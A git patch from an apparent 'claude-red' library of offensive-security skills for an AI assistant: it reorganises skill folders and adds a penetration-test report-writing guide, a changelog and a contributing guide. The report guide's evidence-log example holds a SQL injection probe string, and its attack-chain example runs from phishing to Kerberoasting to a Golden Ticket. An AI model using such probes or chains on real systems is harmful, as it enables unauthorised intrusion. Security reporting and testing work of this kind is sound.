exploit-dev}/offensive-crash-analysis/SKILL.md (100%) rename Skills/{ => exploit-dev}/offensive-exploit-dev-course/SKILL.md (100%) rename Skills/{ => exploit-dev}/offensive-exploit-development/SKILL.md (100%) rename Skills/{ => exploit-dev}/offensive-mitigations/SKILL.md (100%) rename Skills/{ => exploit-dev}/offensive-toctou/SKILL.md (100%) rename Skills/{ => fuzzing}/offensive-bug-identification/SKILL.md (100%) rename Skills/{ => fuzzing}/offensive-fuzzing-course/SKILL.md (100%) rename Skills/{ => fuzzing}/offensive-fuzzing/SKILL.md (100%) rename Skills/{ => fuzzing}/offensive-vuln-classes/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-advanced-redteam/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-edr-evasion/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-initial-access/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-keylogger-arch/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-shellcode/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-windows-boundaries/SKILL.md (100%) rename Skills/{ => infrastructure}/offensive-windows-mitigations/SKILL.md (100%) rename Skills/{ => iot}/offensive-iot/SKILL.md (100%) rename Skills/{ => mobile}/offensive-mobile/SKILL.md (100%) rename Skills/{ => recon}/offensive-osint-methodology/SKILL.md (100%) rename Skills/{ => recon}/offensive-osint/SKILL.md (100%) rename Skills/{ => utility}/offensive-fast-checking/SKILL.md (100%) create mode 100644 Skills/utility/offensive-reporting/SKILL.md rename Skills/{ => web}/offensive-business-logic/SKILL.md (100%) rename Skills/{ => web}/offensive-deserialization/SKILL.md (100%) rename Skills/{ => web}/offensive-file-upload/SKILL.md (100%) rename Skills/{ => web}/offensive-graphql/SKILL.md (100%) rename Skills/{ => web}/offensive-idor/SKILL.md (100%) rename Skills/{ => web}/offensive-open-redirect/SKILL.md (100%) rename Skills/{ => web}/offensive-parameter-pollution/SKILL.md (100%) rename Skills/{ => web}/offensive-race-condition/SKILL.md (100%) rename Skills/{ => web}/offensive-rce/SKILL.md (100%) rename Skills/{ => web}/offensive-request-smuggling/SKILL.md (100%) rename Skills/{ => web}/offensive-sqli/SKILL.md (100%) rename Skills/{ => web}/offensive-ssrf/SKILL.md (100%) rename Skills/{ => web}/offensive-ssti/SKILL.md (100%) rename Skills/{ => web}/offensive-waf-bypass/SKILL.md (100%) rename Skills/{ => web}/offensive-xss/SKILL.md (100%) rename Skills/{ => web}/offensive-xxe/SKILL.md (100%) rename Skills/{ => wireless}/offensive-wifi/SKILL.md (100%) diff --git a/Skills/offensive-active-directory/SKILL.md b/Skills/active-directory/offensive-active-directory/SKILL.md similarity index 100% rename from Skills/offensive-active-directory/SKILL.md rename to Skills/active-directory/offensive-active-directory/SKILL.md diff --git a/Skills/offensive-ai-security/SKILL.md b/Skills/ai/offensive-ai-security/SKILL.md similarity index 100% rename from Skills/offensive-ai-security/SKILL.md rename to Skills/ai/offensive-ai-security/SKILL.md diff --git a/Skills/offensive-jwt/SKILL.md b/Skills/auth/offensive-jwt/SKILL.md similarity index 100% rename from Skills/offensive-jwt/SKILL.md rename to Skills/auth/offensive-jwt/SKILL.md diff --git a/Skills/offensive-oauth/SKILL.md b/Skills/auth/offensive-oauth/SKILL.md similarity index 100% rename from Skills/offensive-oauth/SKILL.md rename to Skills/auth/offensive-oauth/SKILL.md diff --git a/Skills/offensive-cloud/SKILL.md b/Skills/cloud/offensive-cloud/SKILL.md similarity index 100% rename from Skills/offensive-cloud/SKILL.md rename to Skills/cloud/offensive-cloud/SKILL.md diff --git a/Skills/offensive-basic-exploitation/SKILL.md b/Skills/exploit-dev/offensive-basic-exploitation/SKILL.md similarity index 100% rename from Skills/offensive-basic-exploitation/SKILL.md rename to Skills/exploit-dev/offensive-basic-exploitation/SKILL.md diff --git a/Skills/offensive-crash-analysis/SKILL.md b/Skills/exploit-dev/offensive-crash-analysis/SKILL.md similarity index 100% rename from Skills/offensive-crash-analysis/SKILL.md rename to Skills/exploit-dev/offensive-crash-analysis/SKILL.md diff --git a/Skills/offensive-exploit-dev-course/SKILL.md b/Skills/exploit-dev/offensive-exploit-dev-course/SKILL.md similarity index 100% rename from Skills/offensive-exploit-dev-course/SKILL.md rename to Skills/exploit-dev/offensive-exploit-dev-course/SKILL.md diff --git a/Skills/offensive-exploit-development/SKILL.md b/Skills/exploit-dev/offensive-exploit-development/SKILL.md similarity index 100% rename from Skills/offensive-exploit-development/SKILL.md rename to Skills/exploit-dev/offensive-exploit-development/SKILL.md diff --git a/Skills/offensive-mitigations/SKILL.md b/Skills/exploit-dev/offensive-mitigations/SKILL.md similarity index 100% rename from Skills/offensive-mitigations/SKILL.md rename to Skills/exploit-dev/offensive-mitigations/SKILL.md diff --git a/Skills/offensive-toctou/SKILL.md b/Skills/exploit-dev/offensive-toctou/SKILL.md similarity index 100% rename from Skills/offensive-toctou/SKILL.md rename to Skills/exploit-dev/offensive-toctou/SKILL.md diff --git a/Skills/offensive-bug-identification/SKILL.md b/Skills/fuzzing/offensive-bug-identification/SKILL.md similarity index 100% rename from Skills/offensive-bug-identification/SKILL.md rename to Skills/fuzzing/offensive-bug-identification/SKILL.md diff --git a/Skills/offensive-fuzzing-course/SKILL.md b/Skills/fuzzing/offensive-fuzzing-course/SKILL.md similarity index 100% rename from Skills/offensive-fuzzing-course/SKILL.md rename to Skills/fuzzing/offensive-fuzzing-course/SKILL.md diff --git a/Skills/offensive-fuzzing/SKILL.md b/Skills/fuzzing/offensive-fuzzing/SKILL.md similarity index 100% rename from Skills/offensive-fuzzing/SKILL.md rename to Skills/fuzzing/offensive-fuzzing/SKILL.md diff --git a/Skills/offensive-vuln-classes/SKILL.md b/Skills/fuzzing/offensive-vuln-classes/SKILL.md similarity index 100% rename from Skills/offensive-vuln-classes/SKILL.md rename to Skills/fuzzing/offensive-vuln-classes/SKILL.md diff --git a/Skills/offensive-advanced-redteam/SKILL.md b/Skills/infrastructure/offensive-advanced-redteam/SKILL.md similarity index 100% rename from Skills/offensive-advanced-redteam/SKILL.md rename to Skills/infrastructure/offensive-advanced-redteam/SKILL.md diff --git a/Skills/offensive-edr-evasion/SKILL.md b/Skills/infrastructure/offensive-edr-evasion/SKILL.md similarity index 100% rename from Skills/offensive-edr-evasion/SKILL.md rename to Skills/infrastructure/offensive-edr-evasion/SKILL.md diff --git a/Skills/offensive-initial-access/SKILL.md b/Skills/infrastructure/offensive-initial-access/SKILL.md similarity index 100% rename from Skills/offensive-initial-access/SKILL.md rename to Skills/infrastructure/offensive-initial-access/SKILL.md diff --git a/Skills/offensive-keylogger-arch/SKILL.md b/Skills/infrastructure/offensive-keylogger-arch/SKILL.md similarity index 100% rename from Skills/offensive-keylogger-arch/SKILL.md rename to Skills/infrastructure/offensive-keylogger-arch/SKILL.md diff --git a/Skills/offensive-shellcode/SKILL.md b/Skills/infrastructure/offensive-shellcode/SKILL.md similarity index 100% rename from Skills/offensive-shellcode/SKILL.md rename to Skills/infrastructure/offensive-shellcode/SKILL.md diff --git a/Skills/offensive-windows-boundaries/SKILL.md b/Skills/infrastructure/offensive-windows-boundaries/SKILL.md similarity index 100% rename from Skills/offensive-windows-boundaries/SKILL.md rename to Skills/infrastructure/offensive-windows-boundaries/SKILL.md diff --git a/Skills/offensive-windows-mitigations/SKILL.md b/Skills/infrastructure/offensive-windows-mitigations/SKILL.md similarity index 100% rename from Skills/offensive-windows-mitigations/SKILL.md rename to Skills/infrastructure/offensive-windows-mitigations/SKILL.md diff --git a/Skills/offensive-iot/SKILL.md b/Skills/iot/offensive-iot/SKILL.md similarity index 100% rename from Skills/offensive-iot/SKILL.md rename to Skills/iot/offensive-iot/SKILL.md diff --git a/Skills/offensive-mobile/SKILL.md b/Skills/mobile/offensive-mobile/SKILL.md similarity index 100% rename from Skills/offensive-mobile/SKILL.md rename to Skills/mobile/offensive-mobile/SKILL.md diff --git a/Skills/offensive-osint-methodology/SKILL.md b/Skills/recon/offensive-osint-methodology/SKILL.md similarity index 100% rename from Skills/offensive-osint-methodology/SKILL.md rename to Skills/recon/offensive-osint-methodology/SKILL.md diff --git a/Skills/offensive-osint/SKILL.md b/Skills/recon/offensive-osint/SKILL.md similarity index 100% rename from Skills/offensive-osint/SKILL.md rename to Skills/recon/offensive-osint/SKILL.md diff --git a/Skills/offensive-fast-checking/SKILL.md b/Skills/utility/offensive-fast-checking/SKILL.md similarity index 100% rename from Skills/offensive-fast-checking/SKILL.md rename to Skills/utility/offensive-fast-checking/SKILL.md diff --git a/Skills/utility/offensive-reporting/SKILL.md b/Skills/utility/offensive-reporting/SKILL.md new file mode 100644 index 0000000..536c2dd --- /dev/null +++ b/Skills/utility/offensive-reporting/SKILL.md @@ -0,0 +1,371 @@ +--- +name: offensive-reporting +description: "Penetration test and red team report writing methodology. Covers executive summary structuring (risk-led narrative for non-technical readers), technical finding format (title, severity, affected scope, narrative, reproduction steps, impact, remediation, references), CVSS v3.1 / v4.0 scoring with vector justification, OWASP risk rating, evidence hygiene (redacting credentials, hashing client data, time-stamping every action), screenshot and PoC artifact management, finding chain narratives, scope/limitations/assumptions documentation, retest evidence and remediation tracking, deliverable formats (PDF, DOCX, HTML, JSON for SIEM ingestion), client-customer-deliverable separation, and common report mistakes (over-CVSSing, undermining the triager, missing the 'so what'). Use at the end of an engagement when authoring a deliverable, when restructuring a draft for executive readability, or when establishing a reusable report template for a consulting practice." +--- + +# Penetration Test Reporting — Professional Methodology + +A great finding lost in a bad report is a wasted finding. Reports are the artifact the client pays for, the auditor reads, and the developer fixes from. Treat the report with the same rigor as the exploit. + +## Quick Workflow + +1. Capture evidence as you exploit — never reconstruct after the fact +2. Draft each finding immediately while context is fresh; one finding = one numbered file +3. Build the executive summary last, after all findings are scored +4. Two-pass review: technical accuracy first, then read-as-CISO for narrative +5. Hand off with a retest plan and a JSON/CSV index for the client's tracking system + +--- + +## Report Structure (Standard) + +``` +1. Executive Summary ← Last to write, first read +2. Engagement Overview + 2.1 Scope + 2.2 Methodology + 2.3 Limitations / Assumptions + 2.4 Timeline + 2.5 Team +3. Risk Summary ← Heatmap, finding count by severity +4. Technical Findings ← One per finding, sorted by severity +5. Attack Narratives / Chains ← Critical chains called out separately +6. Strategic Recommendations ← Programmatic, not finding-by-finding +7. Appendices + A. Tools Used + B. Indicators of Compromise (for blue team) + C. Raw Evidence Pointers + D. Glossary +``` + +--- + +## Executive Summary — The 90-Second Read + +The executive summary is for the CISO, the GRC officer, and the board member. They read this and nothing else. + +**Structure (one page max):** + +1. **Engagement context** — what was tested, when, by whom (1 sentence) +2. **Headline finding** — the worst thing you found, in business terms (2–3 sentences) +3. **Risk verdict** — overall posture in plain language (1 paragraph) +4. **Counts** — number of findings by severity, in a small table +5. **Top 3 strategic recommendations** — programmatic fixes, not "patch CVE-X" + +**Words to avoid in the executive summary:** +`payload`, `RCE`, `XSS`, `LDAP`, `SMB`, `kerberos`, `injection`. Translate every one. ("An attacker could run arbitrary commands on the server" not "RCE via deserialization gadget chain.") + +**Words to include:** +Business impact (`customer data`, `regulatory exposure`, `operational disruption`, `financial loss`). Anchor every finding to a business consequence. + +--- + +## Technical Finding Template + +```markdown +## Finding ID — Short Descriptive Title + +**Severity:** Critical (CVSS 9.8 — vector below) +**Affected Scope:** +**Status:** Open / Fixed in retest / Accepted Risk +**CWE:** CWE-89 (SQL Injection) +**OWASP:** A03:2021 — Injection + +### Summary +One paragraph. What is the finding, why does it matter, what's the worst case. + +### Background +What technology is involved and why this class of bug exists. Two paragraphs max. +Skip if obvious (e.g. don't explain XSS to an XSS shop). + +### Description +Detailed walkthrough of the issue. The root cause, not just the symptom. + +### Reproduction Steps +1. Numbered, copy-paste ready. +2. Include the exact request/response, redacted. +3. A reader with no engagement context should reproduce in <15 minutes. + +### Evidence +- `screenshots/finding-007/01-payload.png` +- `requests/finding-007/initial-poc.http` +- `evidence-log.csv` line 142 (timestamp 2025-04-12 14:33:07Z) + +### Impact +Concrete. Quantified where possible. +- "Read access to the entire customer table (~2.3M records)" +- "Authenticate as any user; verified for sample ID 1, 2, 999, 1000000" +- "Cross-tenant access — verified by reading data from acquired-tenant ABC" + +### Remediation +Specific, actionable, ordered by precedence: +1. **Fix the bug** — exact code change or config flag +2. **Defense in depth** — secondary control (WAF rule, input validation) +3. **Detection** — log line / SIEM rule that would have caught the exploit + +### References +- CWE / OWASP / CAPEC +- Vendor advisory if known CVE +- Blog posts only if directly relevant + +### Notes for Retest +What you'd do to verify the fix. Specific request, specific expected response. +``` + +--- + +## Severity Scoring + +### CVSS v3.1 Discipline + +CVSS is a tool, not a verdict. Score it, then sanity-check against business impact. + +``` +CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8 Critical +``` + +For every metric, justify the choice in one sentence: +- `AV:N` — exposed to internet (port 443) +- `AC:L` — no special preconditions +- `PR:N` — no authentication needed +- `UI:N` — no user interaction +- `S:U` — does not cross security scope +- `C:H` `I:H` `A:H` — full read/write/availability impact on the database + +If two reasonable people would score it differently, document why you chose what you chose. + +### When CVSS Lies + +CVSS doesn't capture business context. A "Medium" CVSS XSS in the customer support chat panel that authenticated agents use to handle PII is more dangerous than an unauthenticated "High" SSRF on a metadata-less internal service. Use CVSS as the floor, not the ceiling. + +In those cases, score CVSS honestly and then **add a "Business Impact Adjustment"** paragraph that argues for higher reporting severity. Don't lie with CVSS. + +### CVSS v4.0 (where required) + +CVSS v4.0 adds environmental and threat metrics that better capture real-world risk. Use it when the client mandates it (PCI DSS 4.0 trends this way) — otherwise v3.1 stays the lingua franca. + +### OWASP Risk Rating (alternative) + +For web-app-only engagements where CVSS feels stretched, OWASP's risk rating (likelihood × impact across multiple factors) often communicates better. + +--- + +## Evidence Discipline + +### What to Capture + +For every finding, every action: + +1. **Timestamp** (UTC, ISO 8601) +2. **Source IP** (yours, including any pivot) +3. **Target** (host, URL, RPC interface) +4. **Action** (what request was sent) +5. **Result** (response, what you got) +6. **Hash** of any data extracted (so you can prove what you saw) + +```csv +timestamp,operator,src_ip,target,action,result_hash,notes +2025-04-12T14:33:07Z,KA,10.10.10.5,app.client.com,SQLi probe ' OR 1=1--,sha256:abc...,initial detection +``` + +This is the audit trail. Clients with mature security teams will ask for it. + +### Redaction Rules + +Before any artifact leaves your secure environment: + +- **Replace credentials** with placeholders: ``, `` +- **Hash extracted PII** — never include real names, emails, SSNs in screenshots +- **Crop screenshots** to the relevant area; check for browser tab leaks (other tabs visible) +- **Strip EXIF** from images; auto-redact via `exiftool -all= *.png` +- **Remove debug toolbars** from screenshots that reveal client infrastructure paths +- **Verify URLs in screenshots** don't include session tokens + +### Storage & Chain of Custody + +- Encrypted volume during the engagement (LUKS, FileVault, BitLocker) +- Per-engagement key, not a master operator key +- Wipe to client-spec at end of engagement (typically 30–90 days post-delivery) +- Retain only the report and a hash manifest of evidence, deletable on request + +--- + +## Scope, Limitations, and Assumptions + +These three sections protect both you and the client. Be explicit. + +### Scope +- IPs / domains / repos / accounts in scope, with start/end of engagement window +- Excluded: third-party SaaS used by the client (they don't own it) +- Out of scope by request: physical, social engineering against staff, DoS + +### Limitations +- "Testing was conducted from the internet only; no internal network access provided" +- "Source code review was not in scope" +- "Production database mutations were avoided per ROE" +- "No coordinated downtime — testing windows were 22:00–06:00 UTC" + +### Assumptions +- "We assumed the staging environment mirrors production" +- "We assumed the WAF in front of app.client.com is the same as production" +- "Service accounts with admin rights were assumed pre-existing" + +--- + +## Risk Summary & Heatmap + +Show, don't tell. A visual summary every executive can read in 5 seconds: + +``` +Severity Count Top Example +Critical 3 RCE via deserialization (Finding #2) +High 7 ADCS ESC1 → Domain Admin (Finding #11) +Medium 14 Stored XSS in customer support panel (Finding #4) +Low 22 TLS 1.0 still enabled on api.client.com (Finding #29) +Info 11 — +``` + +A simple bar chart or stoplight grid converts this to a one-glance summary. Put it on page 2 (after exec summary). + +--- + +## Attack Chains / Narratives + +Critical findings rarely matter in isolation. The chain is the story: + +``` +1. Phishing email → user runs HTA payload (Finding #1, Medium) +2. Local UAC bypass via Token Manipulation (Finding #5, Low) +3. Kerberoast service account (Finding #11, High) +4. Crack TGS offline → service account password (Finding #11) +5. ACL abuse: service account has WriteDacl on Domain Users (Finding #14, High) +6. Grant DCSync, dump krbtgt → Golden Ticket → Domain Admin (Finding #15, Critical) + +Total time: 4 hours. Detection points missed: 3 (see Appendix B). +``` + +Highlight chains separately because the *combination* often warrants higher severity than any individual finding. + +--- + +## Strategic Recommendations + +Below the per-finding remediations, write 3–5 programmatic recommendations: + +- "Adopt SAST in CI for Java services" (addresses 12 findings) +- "Roll out tier-0 admin model for AD" (addresses entire AD attack chain) +- "Centralize secrets in HashiCorp Vault; rotate hardcoded creds" (addresses 9 findings) + +This is what the CISO presents to the board. Make it memorable. + +--- + +## Deliverable Formats + +| Format | Use | +|--------|-----| +| **PDF** | Executive read, formal record, contractual deliverable | +| **DOCX** | If the client wants to redact or extend | +| **HTML** | Internal portal upload, searchable via grep | +| **JSON** | SIEM / GRC tool ingestion (DefectDojo, Faraday, ServiceNow) | +| **CSV** | Quick import into Jira / Asana for tracking | +| **Markdown source** | The single source of truth that generates all the above | + +Build all formats from one Markdown source via Pandoc / a static site generator. Never maintain parallel formats by hand. + +```bash +# Markdown → polished PDF via Pandoc + LaTeX template +pandoc report.md -o report.pdf \ + --template=client-template.tex \ + --pdf-engine=xelatex \ + --metadata=title:"Penetration Test Report — Client Co." \ + --toc --number-sections +``` + +--- + +## Common Report Mistakes + +| Mistake | Fix | +|---------|-----| +| CVSS 9.0 on every finding ("over-CVSSing") | Score honestly; clients lose trust if everything is critical | +| Marketing language ("revolutionary attack") | Plain professional tone | +| Tool output dumped as evidence | Curate; show the relevant 5 lines | +| Generic remediation ("validate input") | Specific code/config changes | +| Missing reproduction steps | If they can't reproduce, they can't fix | +| Untimed evidence | Every action gets a UTC timestamp | +| Confusing identical findings | Group by class, list affected items in a table | +| Forgotten retest plan | Each finding includes how you'll verify the fix | +| Failure to separate scope from limitations | Scope = what we tested; Limitations = what blocked us | +| Treating informational findings as filler | Either drop them or write them well | + +--- + +## Reporting for Bug Bounty (Different Audience) + +Bug bounty triagers are time-pressured and skeptical. Adjust: + +- **Title**: include the bug class + endpoint + impact in 80 chars +- **Reproduction**: a single curl command if possible, plus the expected vs actual response +- **Impact**: anchor to the program's threat model (read PII? auth bypass? cross-account?) +- **Avoid**: walls of text, screenshots without a request log, claims without reproduction + +A good bounty report is read in 2 minutes and reproduced in 5. A bad one bounces with "more info." + +--- + +## Retest & Closeout + +```markdown +### Retest Summary + +| Finding | Original Severity | Retest Status | Verification Date | +|---------|-------------------|---------------|-------------------| +| #1 | Critical | ✓ Fixed (verified) | 2025-05-10 | +| #2 | High | ✓ Fixed | 2025-05-10 | +| #5 | Medium | ⚠ Partially fixed — see notes | 2025-05-10 | +| #11 | High | ✗ Not fixed — finding stands | 2025-05-10 | +| #14 | Low | • Accepted Risk (client decision) | 2025-05-10 | +``` + +For each finding, include the exact verification request/response showing the fix. Without proof, "fixed" is hearsay. + +--- + +## Sample CVSS Vectors (Reference) + +| Class | Typical Vector | Score | +|-------|---------------|-------| +| Unauth RCE | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | 9.8 | +| Authed RCE | `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` | 8.8 | +| Stored XSS | `AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N` | 5.4 | +| IDOR (PII read) | `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` | 6.5 | +| SSRF (cloud meta) | `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N` | 9.0 | +| Open Redirect | `AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N` | 4.3 | + +Use these as starting points; adjust per environment. + +--- + +## Tooling + +| Tool | Use | +|------|-----| +| Pandoc + LaTeX | Markdown → polished PDF | +| Sphinx / mkdocs | Markdown → HTML portal | +| DefectDojo | Finding tracking, JSON export | +| Faraday | Multi-engagement aggregation | +| Dradis | Collaborative report drafting | +| serpico (legacy but still used) | Pentest report templates | +| Plextrac | Commercial reporting platform | + +--- + +## Key References + +- NIST SP 800-115 (technical security testing reporting) +- PTES — Penetration Testing Execution Standard, reporting section +- OWASP Testing Guide — reporting chapter +- FIRST CVSS v3.1 / v4.0 specifications +- CREST Cyber Security Incident Response and Penetration Testing reporting standards +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/reporting.md diff --git a/Skills/offensive-business-logic/SKILL.md b/Skills/web/offensive-business-logic/SKILL.md similarity index 100% rename from Skills/offensive-business-logic/SKILL.md rename to Skills/web/offensive-business-logic/SKILL.md diff --git a/Skills/offensive-deserialization/SKILL.md b/Skills/web/offensive-deserialization/SKILL.md similarity index 100% rename from Skills/offensive-deserialization/SKILL.md rename to Skills/web/offensive-deserialization/SKILL.md diff --git a/Skills/offensive-file-upload/SKILL.md b/Skills/web/offensive-file-upload/SKILL.md similarity index 100% rename from Skills/offensive-file-upload/SKILL.md rename to Skills/web/offensive-file-upload/SKILL.md diff --git a/Skills/offensive-graphql/SKILL.md b/Skills/web/offensive-graphql/SKILL.md similarity index 100% rename from Skills/offensive-graphql/SKILL.md rename to Skills/web/offensive-graphql/SKILL.md diff --git a/Skills/offensive-idor/SKILL.md b/Skills/web/offensive-idor/SKILL.md similarity index 100% rename from Skills/offensive-idor/SKILL.md rename to Skills/web/offensive-idor/SKILL.md diff --git a/Skills/offensive-open-redirect/SKILL.md b/Skills/web/offensive-open-redirect/SKILL.md similarity index 100% rename from Skills/offensive-open-redirect/SKILL.md rename to Skills/web/offensive-open-redirect/SKILL.md diff --git a/Skills/offensive-parameter-pollution/SKILL.md b/Skills/web/offensive-parameter-pollution/SKILL.md similarity index 100% rename from Skills/offensive-parameter-pollution/SKILL.md rename to Skills/web/offensive-parameter-pollution/SKILL.md diff --git a/Skills/offensive-race-condition/SKILL.md b/Skills/web/offensive-race-condition/SKILL.md similarity index 100% rename from Skills/offensive-race-condition/SKILL.md rename to Skills/web/offensive-race-condition/SKILL.md diff --git a/Skills/offensive-rce/SKILL.md b/Skills/web/offensive-rce/SKILL.md similarity index 100% rename from Skills/offensive-rce/SKILL.md rename to Skills/web/offensive-rce/SKILL.md diff --git a/Skills/offensive-request-smuggling/SKILL.md b/Skills/web/offensive-request-smuggling/SKILL.md similarity index 100% rename from Skills/offensive-request-smuggling/SKILL.md rename to Skills/web/offensive-request-smuggling/SKILL.md diff --git a/Skills/offensive-sqli/SKILL.md b/Skills/web/offensive-sqli/SKILL.md similarity index 100% rename from Skills/offensive-sqli/SKILL.md rename to Skills/web/offensive-sqli/SKILL.md diff --git a/Skills/offensive-ssrf/SKILL.md b/Skills/web/offensive-ssrf/SKILL.md similarity index 100% rename from Skills/offensive-ssrf/SKILL.md rename to Skills/web/offensive-ssrf/SKILL.md diff --git a/Skills/offensive-ssti/SKILL.md b/Skills/web/offensive-ssti/SKILL.md similarity index 100% rename from Skills/offensive-ssti/SKILL.md rename to Skills/web/offensive-ssti/SKILL.md diff --git a/Skills/offensive-waf-bypass/SKILL.md b/Skills/web/offensive-waf-bypass/SKILL.md similarity index 100% rename from Skills/offensive-waf-bypass/SKILL.md rename to Skills/web/offensive-waf-bypass/SKILL.md diff --git a/Skills/offensive-xss/SKILL.md b/Skills/web/offensive-xss/SKILL.md similarity index 100% rename from Skills/offensive-xss/SKILL.md rename to Skills/web/offensive-xss/SKILL.md diff --git a/Skills/offensive-xxe/SKILL.md b/Skills/web/offensive-xxe/SKILL.md similarity index 100% rename from Skills/offensive-xxe/SKILL.md rename to Skills/web/offensive-xxe/SKILL.md diff --git a/Skills/offensive-wifi/SKILL.md b/Skills/wireless/offensive-wifi/SKILL.md similarity index 100% rename from Skills/offensive-wifi/SKILL.md rename to Skills/wireless/offensive-wifi/SKILL.md From d15bc368febda8ffc0a235423aa56eb91ed69795 Mon Sep 17 00:00:00 2001 From: Claude Date: Wed, 6 May 2026 07:56:52 +0000 Subject: [PATCH 3/4] =?UTF-8?q?Phase=207:=20Polish=20=E2=80=94=20README,?= =?UTF-8?q?=20LICENSE,=20SECURITY,=20CONTRIBUTING,=20CHANGELOG,=20install.?= =?UTF-8?q?sh,=20manifest?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - README: full rewrite with TOC, badges, category navigation, quickstart, install snippets, roadmap section, popularity acknowledgement - LICENSE: MIT (was claimed in README, file now present) - SECURITY.md: rewritten with intended-use scope, disclosure policy, supply chain integrity guidance - CONTRIBUTING.md: skill format spec, frontmatter standard, review process, splitting guidance for monolithic skills - CHANGELOG.md: phased roadmap tracking - install.sh: installer with --target, --category, --list, --dry-run modes - tools/build_manifest.py: regenerates claude-skills.json from Skills/ tree - claude-skills.json: machine-readable manifest of 45 skills, 13 categories --- CHANGELOG.md | 49 ++++++ CONTRIBUTING.md | 140 ++++++++++++++++ LICENSE | 21 +++ README.md | 302 ++++++++++++++++++++++++++-------- SECURITY.md | 70 ++++++-- claude-skills.json | 353 ++++++++++++++++++++++++++++++++++++++++ install.sh | 108 ++++++++++++ tools/build_manifest.py | 91 +++++++++++ 8 files changed, 1051 insertions(+), 83 deletions(-) create mode 100644 CHANGELOG.md create mode 100644 CONTRIBUTING.md create mode 100644 LICENSE create mode 100644 claude-skills.json create mode 100755 install.sh create mode 100755 tools/build_manifest.py diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..c7c6690 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,49 @@ +# Changelog + +All notable changes to `claude-red` are documented here. The library follows a phased roadmap (see [README.md](README.md#roadmap)). Versions follow [Semantic Versioning](https://semver.org/) where breaking changes mean skill renames, removals, or category restructures. + +## [Unreleased] + +### Planned + +- Phase 1 — Internal AD/Windows split (16 skills) +- Phase 2 — Cloud Identity / Hybrid (10 skills) +- Phase 3 — Wireless split (12 skills) — **mandatory for v0.3.0** +- Phase 4 — IoT split (10 skills) +- Phase 5 — Web Basics (8 skills) +- Phase 6 — Web Advanced (10 skills) + +## [0.2.0] — 2025-05 + +### Added + +- 7 new offensive skills: + - `offensive-active-directory` — AD attack methodology (Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD) + - `offensive-wifi` — 802.11 attacks (WPA2/WPA3, EAP, KARMA/Mana, KRACK, WPS, BLE, Zigbee, Z-Wave, LoRa, sub-GHz) + - `offensive-business-logic` — workflow bypass, price/coupon/refund abuse, race conditions, anti-fraud defeat, chain construction + - `offensive-toctou` — time-of-check/use across binary, kernel, web, container layers with window-widening primitives + - `offensive-iot` — hardware recon, firmware extraction, RTOS, ICS/OT, wireless protocols, MQTT/CoAP + - `offensive-mobile` — Android+iOS pentest (Frida, pinning bypass, storage, biometric, deep links, Firebase) [category-sized] + - `offensive-cloud` — AWS+Azure+GCP attack paths (privesc, IMDS, cross-account, persistence, CSPM evasion) [category-sized] +- `offensive-reporting` — pro pentest report writing methodology (CVSS scoring, evidence hygiene, executive summaries, finding templates, attack chain narratives, deliverable formats, retest discipline) + +### Changed + +- **Reorganized skills into 13 category subdirectories.** Top-level `Skills/` now contains category folders (`web/`, `auth/`, `active-directory/`, `wireless/`, `cloud/`, `mobile/`, `iot/`, `infrastructure/`, `exploit-dev/`, `fuzzing/`, `recon/`, `ai/`, `utility/`). Skill folder names unchanged. +- README rewritten with category-based navigation, badges, install snippets, and roadmap. +- SECURITY.md rewritten with intended-use scope and disclosure policy. + +### Added (Documentation & Packaging) + +- `LICENSE` — MIT (was claimed in README, file now present) +- `CONTRIBUTING.md` — skill format, frontmatter standard, review process +- `CHANGELOG.md` — this file +- `claude-skills.json` — machine-readable manifest of all skills +- `install.sh` — installer that copies skills into the Claude skills path + +## [0.1.0] — 2024 + +### Added + +- Initial library of 37 offensive security skills, derived from the SnailSploit / Sahar Shlichov offensive checklist collection +- Categories covered: web app, auth, infrastructure & binary, recon, fuzzing, AI security, utility diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..c9a599e --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,140 @@ +# Contributing to claude-red + +Thanks for contributing. This guide explains the skill format, the review process, and the conventions to keep the library coherent as it grows. + +## Quick Rules + +1. **One skill, one surface.** Prefer focused skills (`offensive-kerberoasting`) over monolithic overviews (`offensive-active-directory`). +2. **YAML frontmatter is required.** Skills without it won't load via the Claude Skills system. +3. **Cite sources.** Every technique should be attributable. Link CVEs, advisories, original research. +4. **No unauthorized targeting.** Don't include hardcoded victim domains, real customer data, or credentials. +5. **Use code blocks with language tags.** It's how Claude (and humans) parse them best. + +--- + +## Skill Format + +A skill lives at: + +``` +Skills///SKILL.md +``` + +The folder name **must** match the `name:` field in the frontmatter. + +### Frontmatter (required) + +```yaml +--- +name: offensive- +description: "One paragraph (50–500 words). State the surface, the techniques covered, and when to use this skill. Claude uses this for trigger matching — be specific about scenarios, tools, and sub-topics." +--- +``` + +The `description` is what Claude matches against. Make it dense with relevant terms an operator would mention. Avoid marketing language. + +### Body Structure (recommended) + +```markdown +# + + + +## Quick Workflow + +1. + +--- + +##
